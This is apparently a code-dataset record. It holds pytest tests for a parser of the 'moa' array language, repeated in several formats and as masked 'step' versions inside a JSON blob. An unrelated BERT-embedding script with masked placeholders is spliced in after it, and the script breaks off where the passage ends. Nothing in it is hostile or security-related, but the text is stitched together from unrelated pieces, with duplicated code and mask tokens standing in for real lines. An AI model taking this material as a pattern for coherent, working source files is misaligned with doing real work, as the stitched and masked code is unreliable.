constant=False, identifier='C'))), ('(A omega B) cat C',
BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=None, data=None, constant=False, identifier='B')),
right=NDArray(shape=None, data=None, constant=False, identifier='C'))),
('dim A cat B', BinaryOperation(operator='CAT', left=UnaryOperation(
operator='DIM', right=NDArray(shape=None, data=None, constant=False,
identifier='A')), right=NDArray(shape=None, data=None, constant=False,
identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',
right=BinaryOperation(operator='CAT', left=NDArray(shape=None, data=
None, constant=False, identifier='A'), right=NDArray(shape=None, data=
None, constant=False, identifier='B'))))])
def test_parse_terms_and_operators(expression, result):
parser = build_parser(start='term')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('main(){}', Function(
arguments=[], statements=[], identifier='main')), (
'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),
data=None, constant=False, identifier='A')], statements=[], identifier=
'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',
Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,
identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,
identifier='B')], statements=[], identifier='BizBAZZ')), (
'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',
Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,
identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,
identifier='B'), NDArray(shape=(9,), data=None, constant=False,
identifier='ASDF')], statements=[], identifier='A_2_3_a'))])
def test_parse_function(expression, result):
parser = build_parser(start='function')
assert parser.parse(expression) == result
<|reserved_special_token_1|>
import pytest
from moa.primitives import NDArray, UnaryOperation, BinaryOperation, Function
from moa.yaccer import build_parser
@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(
3,), data=[1, 2, 3], constant=False))])
def test_parse_vector(expression, result):
parser = build_parser(start='vector')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('const array A^3 <4 3 5>',
NDArray(shape=(4, 3, 5), data=None, constant=True, identifier='A'))])
def test_parse_constant_arrays(expression, result):
parser = build_parser(start='constant_array')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('array Zasdf_asdf^1 <3>',
NDArray(shape=(3,), data=None, constant=False, identifier='Zasdf_asdf'))])
def test_parse_arrays(expression, result):
parser = build_parser(start='array')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation
(operator='PSI', left=NDArray(shape=None, data=None, constant=False,
identifier='j'), right=NDArray(shape=None, data=None, constant=False,
identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)
)), ('A omega B cat C', BinaryOperation(operator='CAT', left=
BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,
constant=False, identifier='A'), right=NDArray(shape=None, data=None,
constant=False, identifier='B')), right=NDArray(shape=None, data=None,
constant=False, identifier='C'))), ('(A omega B) cat C',
BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=None, data=None, constant=False, identifier='B')),
right=NDArray(shape=None, data=None, constant=False, identifier='C'))),
('dim A cat B', BinaryOperation(operator='CAT', left=UnaryOperation(
operator='DIM', right=NDArray(shape=None, data=None, constant=False,
identifier='A')), right=NDArray(shape=None, data=None, constant=False,
identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',
right=BinaryOperation(operator='CAT', left=NDArray(shape=None, data=
None, constant=False, identifier='A'), right=NDArray(shape=None, data=
None, constant=False, identifier='B'))))])
def test_parse_terms_and_operators(expression, result):
parser = build_parser(start='term')
assert parser.parse(expression) == result
@pytest.mark.parametrize('expression, result', [('main(){}', Function(
arguments=[], statements=[], identifier='main')), (
'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),
data=None, constant=False, identifier='A')], statements=[], identifier=
'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',
Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,
identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,
identifier='B')], statements=[], identifier='BizBAZZ')), (
'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',
Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,
identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,
identifier='B'), NDArray(shape=(9,), data=None, constant=False,
identifier='ASDF')], statements=[], identifier='A_2_3_a'))])
def test_parse_function(expression, result):
parser = build_parser(start='function')
assert parser.parse(expression) == result
<|reserved_special_token_1|>
import pytest
from moa.primitives import NDArray, UnaryOperation, BinaryOperation, Function
from moa.yaccer import build_parser
@pytest.mark.parametrize("expression,result", [
("< 1 2 3>", NDArray(shape=(3,), data=[1, 2, 3], constant=False)),
])
def test_parse_vector(expression, result):
parser = build_parser(start='vector')
assert parser.parse(expression) == result
@pytest.mark.parametrize("expression, result", [
("const array A^3 <4 3 5>", NDArray(
shape=(4, 3, 5), data=None, constant=True, identifier='A')),
])
def test_parse_constant_arrays(expression, result):
parser = build_parser(start='constant_array')
assert parser.parse(expression) == result
@pytest.mark.parametrize("expression, result", [
("array Zasdf_asdf^1 <3>", NDArray(
shape=(3,), data=None, constant=False, identifier='Zasdf_asdf')),
])
def test_parse_arrays(expression, result):
parser = build_parser(start='array')
assert parser.parse(expression) == result
@pytest.mark.parametrize("expression, result", [
("j psi x", BinaryOperation(
operator='PSI',
left=NDArray(shape=None, data=None, constant=False, identifier='j'),
right=NDArray(shape=None, data=None, constant=False, identifier='x'))),
("A omega <1 2>", BinaryOperation(
operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None))),
("A omega B cat C", BinaryOperation(
operator='CAT',
left=BinaryOperation(
operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=None, data=None, constant=False, identifier='B')),
right=NDArray(shape=None, data=None, constant=False, identifier='C'))),
("(A omega B) cat C", BinaryOperation(
operator='CAT',
left=BinaryOperation(
operator='OMEGA',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=None, data=None, constant=False, identifier='B')),
right=NDArray(shape=None, data=None, constant=False, identifier='C'))),
("dim A cat B", BinaryOperation(
operator='CAT',
left=UnaryOperation(
operator='DIM',
right=NDArray(shape=None, data=None, constant=False, identifier='A')),
right=NDArray(shape=None, data=None, constant=False, identifier='B'))),
("dim (A cat B)", UnaryOperation(
operator='DIM',
right=BinaryOperation(
operator='CAT',
left=NDArray(shape=None, data=None, constant=False, identifier='A'),
right=NDArray(shape=None, data=None, constant=False, identifier='B')))),
])
def test_parse_terms_and_operators(expression, result):
parser = build_parser(start='term')
assert parser.parse(expression) == result
@pytest.mark.parametrize("expression, result", [
    ('main(){}',
     Function(arguments=[], statements=[], identifier='main')),
    ('foo_bar(array A^1 <5>){}',
     Function(
         arguments=[
             NDArray(shape=(5,), data=None, constant=False, identifier='A')],
         statements=[],
         identifier='foo_bar')),
    ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',
     Function(
         arguments=[
             NDArray(shape=(3, 5), data=None, constant=False, identifier='A'),
             NDArray(shape=(6, 5, 8), data=None, constant=False, identifier='B')],
         statements=[],
         identifier='BizBAZZ')),
    ('A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',
     Function(
         arguments=[
             NDArray(shape=(9, 1), data=None, constant=False, identifier='A'),
             NDArray(shape=(3, 1), data=None, constant=False, identifier='B'),
             NDArray(shape=(9,), data=None, constant=False, identifier='ASDF')],
         statements=[],
         identifier='A_2_3_a')),
])
def test_parse_function(expression, result):
    """A function definition must parse into the expected Function node."""
    function_parser = build_parser(start='function')
    assert function_parser.parse(expression) == result
|
flexible
|
{
"blob_id": "a8b5cf45e5f75ae4b493f5fc9bb4555319f1a725",
"index": 5294,
"step-1": "<mask token>\n\n\n@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(\n 3,), data=[1, 2, 3], constant=False))])\ndef test_parse_vector(expression, result):\n parser = build_parser(start='vector')\n assert parser.parse(expression) == result\n\n\n<mask token>\n\n\n@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation\n (operator='PSI', left=NDArray(shape=None, data=None, constant=False,\n identifier='j'), right=NDArray(shape=None, data=None, constant=False,\n identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)\n )), ('A omega B cat C', BinaryOperation(operator='CAT', left=\n BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,\n constant=False, identifier='A'), right=NDArray(shape=None, data=None,\n constant=False, identifier='B')), right=NDArray(shape=None, data=None,\n constant=False, identifier='C'))), ('(A omega B) cat C',\n BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=None, data=None, constant=False, identifier='B')),\n right=NDArray(shape=None, data=None, constant=False, identifier='C'))),\n ('dim A cat B', BinaryOperation(operator='CAT', left=UnaryOperation(\n operator='DIM', right=NDArray(shape=None, data=None, constant=False,\n identifier='A')), right=NDArray(shape=None, data=None, constant=False,\n identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',\n right=BinaryOperation(operator='CAT', left=NDArray(shape=None, data=\n None, constant=False, identifier='A'), right=NDArray(shape=None, data=\n None, constant=False, identifier='B'))))])\ndef test_parse_terms_and_operators(expression, result):\n parser = build_parser(start='term')\n assert parser.parse(expression) == 
result\n\n\n@pytest.mark.parametrize('expression, result', [('main(){}', Function(\n arguments=[], statements=[], identifier='main')), (\n 'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),\n data=None, constant=False, identifier='A')], statements=[], identifier=\n 'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',\n Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,\n identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,\n identifier='B')], statements=[], identifier='BizBAZZ')), (\n 'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',\n Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,\n identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,\n identifier='B'), NDArray(shape=(9,), data=None, constant=False,\n identifier='ASDF')], statements=[], identifier='A_2_3_a'))])\ndef test_parse_function(expression, result):\n parser = build_parser(start='function')\n assert parser.parse(expression) == result\n",
"step-2": "<mask token>\n\n\n@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(\n 3,), data=[1, 2, 3], constant=False))])\ndef test_parse_vector(expression, result):\n parser = build_parser(start='vector')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('const array A^3 <4 3 5>',\n NDArray(shape=(4, 3, 5), data=None, constant=True, identifier='A'))])\ndef test_parse_constant_arrays(expression, result):\n parser = build_parser(start='constant_array')\n assert parser.parse(expression) == result\n\n\n<mask token>\n\n\n@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation\n (operator='PSI', left=NDArray(shape=None, data=None, constant=False,\n identifier='j'), right=NDArray(shape=None, data=None, constant=False,\n identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)\n )), ('A omega B cat C', BinaryOperation(operator='CAT', left=\n BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,\n constant=False, identifier='A'), right=NDArray(shape=None, data=None,\n constant=False, identifier='B')), right=NDArray(shape=None, data=None,\n constant=False, identifier='C'))), ('(A omega B) cat C',\n BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=None, data=None, constant=False, identifier='B')),\n right=NDArray(shape=None, data=None, constant=False, identifier='C'))),\n ('dim A cat B', BinaryOperation(operator='CAT', left=UnaryOperation(\n operator='DIM', right=NDArray(shape=None, data=None, constant=False,\n identifier='A')), right=NDArray(shape=None, data=None, constant=False,\n identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',\n right=BinaryOperation(operator='CAT', 
left=NDArray(shape=None, data=\n None, constant=False, identifier='A'), right=NDArray(shape=None, data=\n None, constant=False, identifier='B'))))])\ndef test_parse_terms_and_operators(expression, result):\n parser = build_parser(start='term')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('main(){}', Function(\n arguments=[], statements=[], identifier='main')), (\n 'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),\n data=None, constant=False, identifier='A')], statements=[], identifier=\n 'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',\n Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,\n identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,\n identifier='B')], statements=[], identifier='BizBAZZ')), (\n 'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',\n Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,\n identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,\n identifier='B'), NDArray(shape=(9,), data=None, constant=False,\n identifier='ASDF')], statements=[], identifier='A_2_3_a'))])\ndef test_parse_function(expression, result):\n parser = build_parser(start='function')\n assert parser.parse(expression) == result\n",
"step-3": "<mask token>\n\n\n@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(\n 3,), data=[1, 2, 3], constant=False))])\ndef test_parse_vector(expression, result):\n parser = build_parser(start='vector')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('const array A^3 <4 3 5>',\n NDArray(shape=(4, 3, 5), data=None, constant=True, identifier='A'))])\ndef test_parse_constant_arrays(expression, result):\n parser = build_parser(start='constant_array')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('array Zasdf_asdf^1 <3>',\n NDArray(shape=(3,), data=None, constant=False, identifier='Zasdf_asdf'))])\ndef test_parse_arrays(expression, result):\n parser = build_parser(start='array')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation\n (operator='PSI', left=NDArray(shape=None, data=None, constant=False,\n identifier='j'), right=NDArray(shape=None, data=None, constant=False,\n identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)\n )), ('A omega B cat C', BinaryOperation(operator='CAT', left=\n BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,\n constant=False, identifier='A'), right=NDArray(shape=None, data=None,\n constant=False, identifier='B')), right=NDArray(shape=None, data=None,\n constant=False, identifier='C'))), ('(A omega B) cat C',\n BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=None, data=None, constant=False, identifier='B')),\n right=NDArray(shape=None, data=None, constant=False, identifier='C'))),\n ('dim A cat B', BinaryOperation(operator='CAT', 
left=UnaryOperation(\n operator='DIM', right=NDArray(shape=None, data=None, constant=False,\n identifier='A')), right=NDArray(shape=None, data=None, constant=False,\n identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',\n right=BinaryOperation(operator='CAT', left=NDArray(shape=None, data=\n None, constant=False, identifier='A'), right=NDArray(shape=None, data=\n None, constant=False, identifier='B'))))])\ndef test_parse_terms_and_operators(expression, result):\n parser = build_parser(start='term')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('main(){}', Function(\n arguments=[], statements=[], identifier='main')), (\n 'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),\n data=None, constant=False, identifier='A')], statements=[], identifier=\n 'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',\n Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,\n identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,\n identifier='B')], statements=[], identifier='BizBAZZ')), (\n 'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',\n Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,\n identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,\n identifier='B'), NDArray(shape=(9,), data=None, constant=False,\n identifier='ASDF')], statements=[], identifier='A_2_3_a'))])\ndef test_parse_function(expression, result):\n parser = build_parser(start='function')\n assert parser.parse(expression) == result\n",
"step-4": "import pytest\nfrom moa.primitives import NDArray, UnaryOperation, BinaryOperation, Function\nfrom moa.yaccer import build_parser\n\n\n@pytest.mark.parametrize('expression,result', [('< 1 2 3>', NDArray(shape=(\n 3,), data=[1, 2, 3], constant=False))])\ndef test_parse_vector(expression, result):\n parser = build_parser(start='vector')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('const array A^3 <4 3 5>',\n NDArray(shape=(4, 3, 5), data=None, constant=True, identifier='A'))])\ndef test_parse_constant_arrays(expression, result):\n parser = build_parser(start='constant_array')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('array Zasdf_asdf^1 <3>',\n NDArray(shape=(3,), data=None, constant=False, identifier='Zasdf_asdf'))])\ndef test_parse_arrays(expression, result):\n parser = build_parser(start='array')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('j psi x', BinaryOperation\n (operator='PSI', left=NDArray(shape=None, data=None, constant=False,\n identifier='j'), right=NDArray(shape=None, data=None, constant=False,\n identifier='x'))), ('A omega <1 2>', BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None)\n )), ('A omega B cat C', BinaryOperation(operator='CAT', left=\n BinaryOperation(operator='OMEGA', left=NDArray(shape=None, data=None,\n constant=False, identifier='A'), right=NDArray(shape=None, data=None,\n constant=False, identifier='B')), right=NDArray(shape=None, data=None,\n constant=False, identifier='C'))), ('(A omega B) cat C',\n BinaryOperation(operator='CAT', left=BinaryOperation(operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=None, data=None, constant=False, identifier='B')),\n 
right=NDArray(shape=None, data=None, constant=False, identifier='C'))),\n ('dim A cat B', BinaryOperation(operator='CAT', left=UnaryOperation(\n operator='DIM', right=NDArray(shape=None, data=None, constant=False,\n identifier='A')), right=NDArray(shape=None, data=None, constant=False,\n identifier='B'))), ('dim (A cat B)', UnaryOperation(operator='DIM',\n right=BinaryOperation(operator='CAT', left=NDArray(shape=None, data=\n None, constant=False, identifier='A'), right=NDArray(shape=None, data=\n None, constant=False, identifier='B'))))])\ndef test_parse_terms_and_operators(expression, result):\n parser = build_parser(start='term')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize('expression, result', [('main(){}', Function(\n arguments=[], statements=[], identifier='main')), (\n 'foo_bar(array A^1 <5>){}', Function(arguments=[NDArray(shape=(5,),\n data=None, constant=False, identifier='A')], statements=[], identifier=\n 'foo_bar')), ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}',\n Function(arguments=[NDArray(shape=(3, 5), data=None, constant=False,\n identifier='A'), NDArray(shape=(6, 5, 8), data=None, constant=False,\n identifier='B')], statements=[], identifier='BizBAZZ')), (\n 'A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}',\n Function(arguments=[NDArray(shape=(9, 1), data=None, constant=False,\n identifier='A'), NDArray(shape=(3, 1), data=None, constant=False,\n identifier='B'), NDArray(shape=(9,), data=None, constant=False,\n identifier='ASDF')], statements=[], identifier='A_2_3_a'))])\ndef test_parse_function(expression, result):\n parser = build_parser(start='function')\n assert parser.parse(expression) == result\n",
"step-5": "import pytest\n\nfrom moa.primitives import NDArray, UnaryOperation, BinaryOperation, Function\nfrom moa.yaccer import build_parser\n\n\n@pytest.mark.parametrize(\"expression,result\", [\n (\"< 1 2 3>\", NDArray(shape=(3,), data=[1, 2, 3], constant=False)),\n])\ndef test_parse_vector(expression, result):\n parser = build_parser(start='vector')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize(\"expression, result\", [\n (\"const array A^3 <4 3 5>\", NDArray(\n shape=(4, 3, 5), data=None, constant=True, identifier='A')),\n])\ndef test_parse_constant_arrays(expression, result):\n parser = build_parser(start='constant_array')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize(\"expression, result\", [\n (\"array Zasdf_asdf^1 <3>\", NDArray(\n shape=(3,), data=None, constant=False, identifier='Zasdf_asdf')),\n])\ndef test_parse_arrays(expression, result):\n parser = build_parser(start='array')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize(\"expression, result\", [\n (\"j psi x\", BinaryOperation(\n operator='PSI',\n left=NDArray(shape=None, data=None, constant=False, identifier='j'),\n right=NDArray(shape=None, data=None, constant=False, identifier='x'))),\n (\"A omega <1 2>\", BinaryOperation(\n operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=(2,), data=[1, 2], constant=False, identifier=None))),\n (\"A omega B cat C\", BinaryOperation(\n operator='CAT',\n left=BinaryOperation(\n operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=None, data=None, constant=False, identifier='B')),\n right=NDArray(shape=None, data=None, constant=False, identifier='C'))),\n (\"(A omega B) cat C\", BinaryOperation(\n operator='CAT',\n left=BinaryOperation(\n operator='OMEGA',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=None, data=None, 
constant=False, identifier='B')),\n right=NDArray(shape=None, data=None, constant=False, identifier='C'))),\n (\"dim A cat B\", BinaryOperation(\n operator='CAT',\n left=UnaryOperation(\n operator='DIM',\n right=NDArray(shape=None, data=None, constant=False, identifier='A')),\n right=NDArray(shape=None, data=None, constant=False, identifier='B'))),\n (\"dim (A cat B)\", UnaryOperation(\n operator='DIM',\n right=BinaryOperation(\n operator='CAT',\n left=NDArray(shape=None, data=None, constant=False, identifier='A'),\n right=NDArray(shape=None, data=None, constant=False, identifier='B')))),\n])\ndef test_parse_terms_and_operators(expression, result):\n parser = build_parser(start='term')\n assert parser.parse(expression) == result\n\n\n@pytest.mark.parametrize(\"expression, result\", [\n ('main(){}', Function(arguments=[], statements=[], identifier='main')),\n ('foo_bar(array A^1 <5>){}', Function(\n arguments=[NDArray(shape=(5,), data=None, constant=False, identifier='A')],\n statements=[],\n identifier='foo_bar')),\n ('BizBAZZ(array A^2 < 3 5>, array B^3 <6 5 8>){}', Function(\n arguments=[\n NDArray(shape=(3, 5), data=None, constant=False, identifier='A'),\n NDArray(shape=(6, 5, 8), data=None, constant=False, identifier='B')],\n statements=[],\n identifier='BizBAZZ')),\n ('A_2_3_a(array A^2 <9 1>, array B^2 <3 1>, array ASDF^1 <9>){}', Function(\n arguments=[\n NDArray(shape=(9, 1), data=None, constant=False, identifier='A'),\n NDArray(shape=(3, 1), data=None, constant=False, identifier='B'),\n NDArray(shape=(9,), data=None, constant=False, identifier='ASDF')],\n statements=[],\n identifier='A_2_3_a')),\n])\ndef test_parse_function(expression, result):\n parser = build_parser(start='function')\n assert parser.parse(expression) == result\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
def embed_last_token(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
valid = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
if buffer == words[tid]:
valid.append(i)
buffer = ''
tid += 1
if len(valid) != len(sent.split()) or tid != len(words):
print(valid)
print(sent.split())
print(result[1])
batch.append(tensor[valid, :])
return batch
def embed_sum(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
token_tensor = []
sent_tensor = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
token_tensor.append(tensor[i, :])
if buffer == words[tid]:
sent_tensor.append(np.stack(token_tensor).mean(axis=0))
token_tensor = []
buffer = ''
tid += 1
if tid != len(words) or len(sent_tensor) != len(words):
print(sent.split())
print(tokens)
exit()
batch.append(np.stack(sent_tensor))
return batch
def generate_bert(path, output, embed_fun=embed_sum):
print(output)
total = 0
with open(path) as src:
batch = []
tensor = []
for line in src:
line = line.strip()
if len(line) == 0:
continue
batch.append(CharTable.convert(line).replace('—', '-').replace(
'‘', "'").replace('…', '.').replace('坜', '壢').replace('唛',
'麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', "'"))
if len(batch) and len(batch) % 100 == 0:
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
batch = []
if len(batch):
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
with open(output, 'wb') as f:
pickle.dump(tensor, f)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def embed_last_token(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
valid = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
if buffer == words[tid]:
valid.append(i)
buffer = ''
tid += 1
if len(valid) != len(sent.split()) or tid != len(words):
print(valid)
print(sent.split())
print(result[1])
batch.append(tensor[valid, :])
return batch
def embed_sum(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
token_tensor = []
sent_tensor = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
token_tensor.append(tensor[i, :])
if buffer == words[tid]:
sent_tensor.append(np.stack(token_tensor).mean(axis=0))
token_tensor = []
buffer = ''
tid += 1
if tid != len(words) or len(sent_tensor) != len(words):
print(sent.split())
print(tokens)
exit()
batch.append(np.stack(sent_tensor))
return batch
def generate_bert(path, output, embed_fun=embed_sum):
print(output)
total = 0
with open(path) as src:
batch = []
tensor = []
for line in src:
line = line.strip()
if len(line) == 0:
continue
batch.append(CharTable.convert(line).replace('—', '-').replace(
'‘', "'").replace('…', '.').replace('坜', '壢').replace('唛',
'麦').replace('ㄅㄆㄇㄈ', '呀呀').replace('’', "'"))
if len(batch) and len(batch) % 100 == 0:
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
batch = []
if len(batch):
tensor.extend(embed_fun(batch))
total += len(batch)
print(total)
with open(output, 'wb') as f:
pickle.dump(tensor, f)
if __name__ == '__main__':
generate_bert('data/semeval15/cz.pas.dev.sent.txt',
'data/embedding/bert_base_sum/cz.pas.dev.bert', embed_fun=embed_sum)
generate_bert('data/semeval15/cz.pas.train.sent.txt',
'data/embedding/bert_base_sum/cz.pas.train.bert', embed_fun=embed_sum)
generate_bert('data/semeval15/cz.id.pas.sent.txt',
'data/embedding/bert_base_sum/cz.id.pas.bert', embed_fun=embed_sum)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
CharTable = JClass('com.hankcs.hanlp.dictionary.other.CharTable')
bc = BertClient(ip='127.0.0.1')
def embed_last_token(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
valid = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
if buffer == words[tid]:
valid.append(i)
buffer = ''
tid += 1
if len(valid) != len(sent.split()) or tid != len(words):
print(valid)
print(sent.split())
print(result[1])
batch.append(tensor[valid, :])
return batch
def embed_sum(text):
result = bc.encode(text, show_tokens=True)
batch = []
for sent, tensor, tokens in zip(text, result[0], result[1]):
token_tensor = []
sent_tensor = []
tid = 0
buffer = ''
words = sent.lower().split()
for i, t in enumerate(tokens):
if t == '[CLS]' or t == '[SEP]':
continue
else:
if t.startswith('##'):
t = t[2:]
elif t == '[UNK]':
t = words[tid][len(buffer)]
buffer += t
token_tensor.append(tensor[i, :])
if buffer == words[tid]:
sent_tensor.append(np.stack(token_tensor).mean(axis=0))
token_tensor = []
buffer = ''
tid += 1
if tid != len(words) or len(sent_tensor) != len(words):
print(sent.split())
print(tokens)
exit()
batch.append(np.stack(sent_tensor))
return batch
def generate_bert(path, output, embed_fun=embed_sum):
print(output)
total = 0
with open(path) as src:
